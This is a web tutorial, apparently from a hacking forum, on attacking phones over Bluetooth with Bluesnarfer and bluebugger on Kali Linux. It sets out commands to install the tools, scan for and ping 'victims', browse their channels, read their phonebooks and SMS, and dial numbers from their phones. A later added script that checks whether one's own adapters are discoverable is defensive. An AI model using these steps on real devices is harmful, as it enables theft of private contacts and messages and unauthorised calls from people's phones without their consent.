(Kali Linux Tutorial) How To Hack Phones With Bluetooth!

A brief tutorial on how to hack a phone via Bluetooth using Bluesnarfer, for Backtrack/Kali Linux.
First, we must install Bluesnarfer. Make your way to the opt directory.
cd /opt
Get Bluesnarfer using the wget command
/opt# wget http://alighieri.org/tools/bluesnarfer.tar.gz
List the directory using the ls command and you will see the Bluesnarfer archive in there. Now we have to extract it.
/opt# ls
To extract it, we use the simple tar xvf command:
/opt# tar xvf bluesnarfer.tar.gz
List the directory once again and you will see the bluesnarfer folder there.
/opt# ls
Let’s enter that folder:
/opt# cd bluesnarfer
Now we finish off the installation by compiling it like this:
/opt/bluesnarfer# make
To see all of the Bluesnarfer commands, run ./bluesnarfer with no arguments:
/opt/bluesnarfer# ./bluesnarfer
Now that we have Bluesnarfer, you must configure rfcomm first, if you haven’t already done that:
mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
mknod --mode=666 /dev/rfcomm0 c 216 0
hciconfig -i hci0 up
hciconfig hci0
(Scan for victims)
hcitool scan hci0
(ping the victim to see if he is awake)
l2ping < victim mac addr>
(browse the victim for rfcomm channels to connect to)
sdptool browse --tree --l2cap < mac addr >
(then you can use bluesnarfer, for example, to read the victim’s phonebook, dial a number, read SMS or other things.)
bluesnarfer -r 1-100 -C 7 -b < mac addr >
(to see the available options)
bluebugger -h
(Dial a number)
bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >
Extra: This is what the Bluesnarfer usage output should look like:
bluesnarfer, version 0.1 -
usage: bluesnarfer [options] [ATCMD] -b bt_addr

ATCMD: valid AT+CMD (GSM EXTENSION)
TYPE: valid phonebook type ..
example: "DC" (dialed call list)
         "SM" (SIM phonebook)
         "RC" (recevied call list)
         "XX" much more

-b bdaddr: Bluetooth device address
-C chan: Bluetooth rfcomm channel
-c ATCMD: custom action
-r N-M: read phonebook entry N to M
-w N-M: delete phonebook entry N to M
-f name: search "name" in phonebook address
-s TYPE: select phonebook memory storage
-l: list available phonebook memory storage
-i: device info
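The scan and l2ping steps above only work against a device that is discoverable or connectable, so the defensive counterpart is to check which state your own adapters are in. The script below is an added example, not part of the original tutorial; the function names and the sample hciconfig output are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original tutorial. Classifies local adapters:
#   ISCAN = answers inquiry, so the adapter shows up in `hcitool scan`
#   PSCAN = accepts connections from anyone who already knows the address
# Constructed sample of `hciconfig` output (addresses are made up).
sample_hciconfig() {
    cat <<'EOF'
hci0:   Type: Primary  Bus: USB
        BD Address: 00:11:22:33:44:55  ACL MTU: 310:10  SCO MTU: 64:8
        UP RUNNING PSCAN ISCAN
hci1:   Type: Primary  Bus: USB
        BD Address: 66:77:88:99:AA:BB  ACL MTU: 310:10  SCO MTU: 64:8
        UP RUNNING PSCAN
hci2:   Type: Primary  Bus: UART
        BD Address: CC:DD:EE:FF:00:11  ACL MTU: 1021:8  SCO MTU: 64:1
        DOWN
EOF
}
# Reads hciconfig output on stdin; prints "<adapter> <address> <state>",
# state being one of: down, hidden, connectable, discoverable.
audit_hciconfig() {
    awk '
        function emit() {
            if (dev == "") return
            state = "hidden"
            if (pscan) state = "connectable"
            if (iscan) state = "discoverable"
            if (!up)   state = "down"
            print dev, addr, state
        }
        /^hci[0-9]+:/ {                      # first line of an adapter block
            emit()
            dev = $1; sub(/:$/, "", dev)
            addr = "unknown"; up = 0; iscan = 0; pscan = 0
            next
        }
        $1 == "BD" && $2 == "Address:" { addr = $3; next }
        $1 == "UP" || $1 == "DOWN" {         # status flag line
            for (i = 1; i <= NF; i++) {
                if ($i == "UP") up = 1
                if ($i == "ISCAN") iscan = 1
                if ($i == "PSCAN") pscan = 1
            }
        }
        END { emit() }
    '
}

sample_hciconfig | audit_hciconfig   # on a real host: hciconfig | audit_hciconfig
```

An adapter reported as discoverable can be taken out of inquiry scan with hciconfig hci0 pscan (connectable only) or hciconfig hci0 noscan (neither).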
If you have any questions regarding Bluetooth hacking or need help capturing packets or anything specific make sure to post your thread here: https://hacktoday.io/c/wifi-hacking/7